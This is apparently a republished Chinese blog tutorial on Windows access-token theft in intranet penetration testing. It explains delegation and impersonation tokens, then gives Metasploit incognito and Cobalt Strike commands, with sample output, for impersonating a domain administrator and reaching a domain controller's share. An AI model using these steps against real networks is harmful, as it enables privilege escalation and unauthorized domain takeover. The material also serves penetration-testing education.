当前位置:网站首页>内网渗透令牌窃取
内网渗透令牌窃取
2022-06-23 16:17:00 【西湖第一剑】
令牌
令牌是描述进程或者线程安全上下文的一个对象。
不同的用户登录计算机后, 都会生成一个Access Token,这个Token在用户创建进程或者线程时会被使用,
不断的拷贝,这也就解释了A用户创建一个进程而该进程没有B用户的权限。一般用户双击运行一个进程都会拷贝explorer.exe的Access Toke
访问令牌分为:
授权令牌(Delegation token):交互式会话登陆(例:本地用户登陆、用户桌面等)
模拟令牌(Impersonation token):非交互式登陆(例:net use 访问共享文件)
两种 token 只有在系统重启后才会清除;授权令牌在⽤户注销后,该令牌会变为模拟令牌依旧有效。
Metasploit进行令牌窃取
此工具需要提权为system权限才能查看所有的token
#加载模块
use incognito
#列出token
list_tokens -u
#窃取token
impersonate_token 'AA\Administrator'
meterpreter > impersonate_token 'AA\Administrator'
[+] Delegation token available
[+] Successfully impersonated user AA\Administrator
meterpreter > getuid
Server username: AA\Administrator
执行完命令后,通过以下命令返回之前的token
rev2self
##或
drop_token
Cobalt strike实战窃取域管理员令牌
提权为system之后,查看进程,发现火狐浏览器是以域管理员身份运行,进行窃取。
beacon> steal_token 1260 窃取令牌
beacon> rev2self 恢复令牌
成功后,访问域控成功相当于提权为域管理员权限
dir\172.16.2.2\c$
边栏推荐
- ABAP随笔-程序优化笔记
- [today in history] June 23: Turing's birthday; The birth of the founder of the Internet; Reddit goes online
- Huawei mobile phones install APK through ADB and prompt "the signature is inconsistent. The application may have been modified."
- Image saving: torchvision utils. save_ image(img, imgPath)
- 以 27K 成功入职字节跳动,这份《 软件测试面试笔记》让我受益终身
- Safe and comfortable, a new generation of Qijun carefully interprets the love of the old father
- ABAP随笔-物料主数据界面增强
- 根据年份获取第一天和最后一天
- leetcode:面試題 08.13. 堆箱子【自頂而下的dfs + memory or 自底而上的排序 + dp】
- Rongyun: let the bank go to the "cloud" easily
猜你喜欢
NLP paper reading | improving semantic representation of intention recognition: isotropic regularization method in supervised pre training

Shushulang passed the listing hearing: the gross profit margin of the tablet business fell, and the profit in 2021 fell by 11% year-on-year

stylegan1: a style-based henerator architecture for gemerative adversarial networks

官方零基础入门 Jetpack Compose 的中文课程来啦!

Redis cluster operation method

混沌工程在云原生中间件稳定性治理中的实践分享

stylegan3:alias-free generative adversarial networks

科大讯飞神经影像疾病预测方案!

Apache foundation officially announced Apache inlong as a top-level project

出现Identify and stop the process that‘s listening on port 8080 or configure this application等解决方法
随机推荐
Apache foundation officially announced Apache inlong as a top-level project
Safe and comfortable, a new generation of Qijun carefully interprets the love of the old father
使用Jmeter进行性能测试及性能监控平台搭建
手机开户股票开户需要多久?在线开户安全么?
什么是抽象类?怎样定义抽象类?
The official Chinese course of zero foundation introduction jetpack compose is coming
Google Play Academy 组队 PK 赛,火热进行中!
Zhongda face sketch FERET database (cufsf)
炒股买股票需要怎么选择呢?安全性不错的?
ADC digital DGND, analog agnd mystery!
Opengauss database source code analysis series articles -- detailed explanation of dense equivalent query technology (Part 2)
TQ of R language using tidyquant package_ The transmute function calculates the daily, monthly and weekly returns of a stock. Ggplot2 uses the bar plot to visualize the monthly return data of the stoc
OutputDebugString instructions and exception handling
亚朵更新招股书:继续推进纳斯达克上市,已提前“套现”2060万元
Code examples of golang goroutine, channel and time
R language uses timeroc package to calculate the multi time AUC value of survival data in the case of no competition, uses Cox model, adds covariates, and visualizes the multi time ROC curve of surviv
get_ edges
Taishan Office Technology Lecture: four cases of using Italic Font
Leetcode: question d'entrevue 08.13. Empiler la boîte [DFS en haut + mémoire ou tri en bas + DP]
leetcode:面试题 08.13. 堆箱子【自顶而下的dfs + memory or 自底而上的排序 + dp】